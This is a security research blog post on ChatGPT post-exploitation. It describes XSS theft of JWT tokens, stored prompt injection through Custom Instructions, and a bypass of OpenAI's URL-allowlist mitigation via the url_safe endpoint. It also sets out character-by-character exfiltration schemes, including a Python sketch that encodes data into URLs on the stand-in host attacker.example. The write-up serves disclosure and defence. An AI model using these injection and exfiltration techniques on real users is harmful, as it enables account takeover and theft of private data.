ChatGPT Vulnerability: Persistent Access and Data Exfiltration Risks Unveiled

Mar 28, 2024 at 09:00 pm

In the second part of our blog post series on ChatGPT, we explore the security implications of AI integration. Based on our previous discovery of XSS vulnerabilities, we examine how attackers could exploit ChatGPT to gain persistent access to user data and manipulate application behavior. We analyze the use of XSS vulnerabilities to exfiltrate JWT access tokens, highlighting the potential for unauthorized account access. We also investigate the risks posed by Custom Instructions in ChatGPT, demonstrating how attackers can manipulate responses to facilitate misinformation, phishing, and sensitive data theft.

ChatGPT: Unveiling the Post-Exploitation Risks and Mitigation Strategies

The integration of artificial intelligence (AI) into our daily routines has changed how we interact with technology. With the arrival of powerful language models like ChatGPT, security researchers are actively scrutinizing the vulnerabilities that arise from their use. In this analysis, we delve deeper into the post-exploitation risks associated with ChatGPT, shedding light on the techniques attackers could employ to gain persistent access to user data and manipulate application behavior.

The Cross-Site Scripting (XSS) Vulnerability

In a previous investigation, our team uncovered two Cross-Site Scripting (XSS) vulnerabilities in ChatGPT. These vulnerabilities allowed a malicious actor to exploit the /api/auth/session endpoint, exfiltrating the user's JWT access token and gaining unauthorized access to their account. While the limited validity period of the access token mitigates the risk of permanent account compromise, it underscores the need for robust security measures to prevent such attacks in the first place.
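To make the point about the token's limited validity concrete, the following is a minimal sketch of how the expiry of a JWT can be read from its payload. It assumes the token carries the standard `exp` claim; the example token, its claims, and the helper names are made up for illustration and do not reflect the actual format of a ChatGPT access token.

```python
import base64
import json
import time
from typing import Optional


def jwt_payload(token: str) -> dict:
    """Decode the payload segment of a JWT WITHOUT verifying its signature."""
    payload_b64 = token.split(".")[1]
    # JWTs use unpadded base64url, so restore the padding before decoding.
    payload_b64 += "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(payload_b64))


def seconds_until_expiry(token: str, now: Optional[float] = None) -> float:
    """Return the remaining validity in seconds (negative once expired)."""
    now = time.time() if now is None else now
    return jwt_payload(token)["exp"] - now


def _b64url(data: dict) -> str:
    """Helper that builds one unpadded base64url JWT segment."""
    raw = json.dumps(data).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


# Hypothetical, unsigned example token; the claims are assumptions.
example_token = ".".join([
    _b64url({"alg": "none", "typ": "JWT"}),
    _b64url({"sub": "user-123", "exp": 1_700_003_600}),
    "",
])

if __name__ == "__main__":
    print(seconds_until_expiry(example_token, now=1_700_000_000))
```

Once `seconds_until_expiry` drops below zero, a stolen token of this kind is no longer accepted, which is why the attacker's window is bounded unless some other foothold persists.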

Persistent Access through Custom Instructions

Custom Instructions in ChatGPT offer users the ability to set persistent contexts for customized conversations. However, this feature could pose security risks, including Stored Prompt Injection. Attackers could leverage XSS vulnerabilities or manipulate custom instructions to alter ChatGPT's responses, potentially facilitating misinformation dissemination, phishing, scams, and the theft of sensitive data. Notably, this manipulative influence could persist even after the user's session token has expired, underscoring the threat of long-term, unauthorized access and control.



Recent Mitigations and the Bypass

In response to the identified vulnerabilities, OpenAI has implemented measures to mitigate the risk of prompt injection attacks. The "browser tool" and markdown image rendering are now only permitted when the URL has been previously present in the conversation. This aims to prevent attackers from embedding dynamic, sensitive data within the URL query parameter or path.
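The rule described above can be sketched as a simple membership check. This is only an illustration of the idea, not OpenAI's implementation: the function names, the URL regular expression, and the example URLs are all assumptions.

```python
import re

# Simplified URL matcher (assumption): stops at whitespace, quotes and brackets.
URL_PATTERN = re.compile(r"https?://[^\s)\"'>]+")


def urls_seen(conversation_text: str) -> set[str]:
    """Collect every URL that appears verbatim in the conversation so far."""
    return set(URL_PATTERN.findall(conversation_text))


def is_url_allowed(url: str, conversation_text: str) -> bool:
    """Allow a URL only if it was already present in the conversation."""
    return url in urls_seen(conversation_text)


if __name__ == "__main__":
    conversation = "Please summarise https://example.com/report for me"
    # A URL the user supplied is allowed.
    print(is_url_allowed("https://example.com/report", conversation))
    # A URL with data appended at response time was never in the
    # conversation, so it is rejected.
    print(is_url_allowed("https://example.com/report?leak=secret", conversation))
```

Under this model, a URL whose query string or path is filled in dynamically at response time fails the check, because that exact string never appeared in the conversation.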

However, our testing revealed a bypass technique that allows attackers to circumvent these restrictions. By abusing the /backend-api/conversation/{uuid}/url_safe?url={url} endpoint, which is used to validate URLs in ChatGPT responses on the client side, attackers can test whether a specific string, including the custom instructions, is present within the conversation text. This bypass lets attackers continue exfiltrating information despite the implemented mitigations.

Exfiltration Techniques Despite Mitigations

Despite OpenAI's efforts to mitigate information exfiltration, we identified several techniques that attackers could still employ:

Static URLs for Each Character:

Attackers could encode sensitive data into static URLs, creating a unique URL for each character they wish to exfiltrate. By using ChatGPT to generate images for each character and observing the order in which the requests are received, attackers can piece together the data on their server.
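A minimal sketch of the per-character scheme shows why a "URL must already be present" rule does not stop it: every URL is fixed in advance, and the data is carried only by the order of the requests. The host `attacker.example`, the `/c/<code point>.png` path layout, and the function names are hypothetical and chosen purely for illustration.

```python
from urllib.parse import urlparse

# Hypothetical base URL; one static image URL exists per character.
BASE = "https://attacker.example/c/"


def char_url(ch: str) -> str:
    """Map a single character to its fixed, pre-defined URL."""
    return f"{BASE}{ord(ch)}.png"


def decode_request_log(requested_urls: list[str]) -> str:
    """Rebuild the text from the order in which the static URLs were requested."""
    chars = []
    for url in requested_urls:
        filename = urlparse(url).path.rsplit("/", 1)[-1]  # e.g. "104.png"
        chars.append(chr(int(filename.removesuffix(".png"))))
    return "".join(chars)


if __name__ == "__main__":
    log = [char_url(c) for c in "hi"]
    print(log)
    print(decode_request_log(log))
```

Because none of these URLs contains dynamic data, a defender looking at any single request sees nothing sensitive; only the sequence as a whole reveals the string.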

One Long Static URL:

Alternatively, attackers could use a single long static URL and ask ChatGPT to create a markdown image up to the character they wish to leak. This approach reduces the number of prompt characters required but may be slower for ChatGPT to render.

Using Domain Patterns:

The fastest method with the least prompt character requirement is using custom top-level domains. However, this method incurs a cost, as each domain would need to be purchased. Attackers could use a custom top-level domain for each character to create distinctive badges that link to the sensitive data.

Other Attack Vectors

Beyond the aforementioned techniques, attackers may also explore the potential for Stored Prompt Injection gadgets within ChatGPTs and the recently introduced ChatGPT memory. These areas could provide additional avenues for exploitation and unauthorized access.

OpenAI's Response and Future Mitigation Strategies

OpenAI is actively working to address the identified vulnerabilities and improve the security of ChatGPT. While the implemented mitigations have made exfiltration more challenging, attackers continue to devise bypass techniques. The ongoing arms race between attackers and defenders highlights the need for continuous monitoring and adaptation of security measures.

Conclusion

The integration of AI into our lives brings forth both opportunities and challenges. While ChatGPT and other language models offer immense potential, it is crucial to remain vigilant of the potential security risks they introduce. By understanding the post-exploitation techniques that attackers could employ, we can develop robust countermeasures and ensure the integrity and security of our systems. As the threat landscape evolves, organizations must prioritize security awareness, adopt best practices, and collaborate with researchers to mitigate the evolving risks associated with AI-powered technologies.

